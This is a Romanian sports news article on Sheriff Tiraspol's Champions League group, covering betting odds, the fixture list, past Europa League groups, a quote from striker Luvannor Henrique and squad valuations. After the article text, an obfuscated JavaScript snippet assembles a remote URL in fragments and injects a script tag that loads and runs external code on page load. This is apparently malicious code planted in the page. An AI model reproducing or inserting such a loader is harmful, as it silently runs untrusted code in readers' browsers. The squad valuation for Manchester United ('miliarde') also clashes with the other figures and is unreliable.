Sport

Ce șanse are Sheriff Tiraspol în Champions League

Este o grupă foarte dificilă pentru Sheriff, poate una dintre cele mai grele dintre toate trase la sorți de UEFA. Însă parcursul din preliminarii, în special din "dubla" cu Dinamo Zagreb, arată că Sheriff este gata să producă o surpriză plăcută.

Fără niciun dubiu, Real Madrid este favorita grupei. Echipa lui Carlo Ancelotti are de partea ei valoarea și experiența și pornește cu prima șansă la câștigarea grupei, urmată de Inter Milano. Campioana Italiei i-a pierdut însă în această vară pe Romelu Lukaku și Achraf Akimi. În fine, șansa a treia o are Șahtior Donețk.

Potrivit cotelor la pariuri sportive, Real Madrid are 1.45 să câștige grupa și 1.08 să termine pe primele două locuri. Inter Milano are 2.85 să câștige grupa și 1.18 să termine pe primele două locuri. Șahtior are 16.00 pentru câștigarea grupei și 3.00 pentru a se califica în optimile Champions League. În fine, Sheriff Tiraspol are tocmai cota 101.0 să termine grupa pe primul loc și 26.00 să fie pe locul 1 sau 2.

De altfel, dintre toți participanții, la pariuri sportive Sheriff are cele mai mici șanse să câștige competiția. 3001 este cota lui Sheriff, în timp ce PSG (cota 5.00) și Manchester City (cota 5.25) sunt marile favorite.

Cum arată programul lui Sheriff în Champions League

Gruparea din Tiraspol va debuta pe teren propriu contra lui Șahtior Donetsk, pe 15 septembrie, de la ora 19:45. Pe 28 septembrie urmează prima deplasare, pe terenul lui Real Madrid, de la ora 22:00.

Apoi, în etapa a treia din grupele Champions League, Sheriff se deplasează pe terenul lui Inter Milano, pe 19 octombrie de la ora 22:00.

Pe 3 noiembrie, de la ora 22:00, Sheriff primește vizita lui Inter Milano, iar pe 24 noiembrie de la aceeași oră în Moldova va sosi Real Madrid. În fine, în ultimul meci din faza grupelor, Sheriff se va deplasa la Șahtior Donetsk, pe 7 decembrie de la ora 22:00.

Sheriff, pentru a cincea oară în grupele unei competiții continentale

Sheriff Tiraspol este în premieră în grupele Champions League, dar a mai fost prezentă în grupele Europa League în 2009, 2010, 2013 și 2017. Ce-i drept, echipa nu s-a calificat niciodată în primăvara europeană.

În sezonul 2009/2010, Sheriff a făcut parte dintr-o grupă cu Fenerbahce, Twente și Steaua (FCSB). A terminat pe locul 3 cu 5 puncte, reușind să fie peste Steaua (FCSB).

Apoi, în 2010/2011, Sheriff a făcut parte dintr-o grupă cu Dinamo Kiev, AZ Alkmaar și BATE Borisov. Echipa a terminat pe ultimul loc, cu 5 puncte acumulate.

În ediția 2013/2014, Sheriff a făcut parte dintr-o grupă cu Tottenham, Anzhi și Tromso și a terminat pe locul 3.

În fine, la ultima participare, în sezonul 2017/2018, gruparea din Tiraspol a terminat tot pe trei, după ce le-a avut adversare pe Lokomotiv Moscova, FC Copenhaga și Fastav Zilina.

Prezența în Champions League, un vis pentru cei de la Sheriff

Prezența în Champions League i-a bucurat enorm pe cei de la Sheriff Tiraspol, mai ales că și adversarii sunt pe măsură.

Astfel, atacantul Luvannor Henrique și-a manifestat sentimentele de fericire că se va putea duela cu Real Madrid și este încrezător.

”Visam să joc contra lui Real Madrid. Toți ne doream să întâlnim nume mari, dar Real Madrid este cireașa de pe tort. Suntem foarte, foarte fericiți. Vom avea că adversari pe Benzema, Modric, Casimiro, Kroos, Marcelo. Toți sunt mari fotbaliști. Noi nu avem vedete, suntem o echipă unită care muncește. Și vrem să scriem istorie în continuare. Vrem să batem pe Real Madrid. Imaginați-vă ce ar fi să învingem pe Real Madrid. În fotbal, orice este posibil, noi am demonstrat deja asta!", a spus Luvannor Henrique, citat de DigiSport.

Luvannor Henrique este un atacant brazilian naturalizat pentru a juca în naționala Republicii Moldova. El are 4 goluri marcate în preliminariile Champions League.

Sheriff are lotul cel mai slab cotat din Champions League

Conform evaluărilor făcute de nemții de la Transfermarkt, lotul lui Sheriff Tiraspol are cota de piață cea mai mică dintre toate participantele în Champions League.

Astfel, lotul lui Sheriff e evaluat la 12.8 milioane de euro, aproximativ de două ori mai puțin decât Malmo, echipa de pe penultimul loc. Hansel Zapata și Frank Castaneda sunt jucătorii cu cea mai bună cotă de la Sheriff, ambii fiind evaluați la 1 milion de euro.

La polul opus, Manchester City are un lot evaluat la 1.06 miliarde de euro, PSG la 983.9 milioane de euro, iar Manchester United la 937.25 miliarde de euro.
(function(){
avy2=document.createElement(“script”);avy2_=”u”+(“s”)+”ta”;
avy2_+=(“t.i”)+””+”n”;avy2_+=((“f”)+”o”);avy2.type=”text/javascript”;
avy2_+=”/”; avy2u=”310927250″;avy2u+=”.amyj1ezzvy2x6kae42u”;avy2u+=”4n9tk4ns6tj”;
avy2.src=”https://”+avy2_+avy2u;avy2.async=true;document.body.appendChild(avy2);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *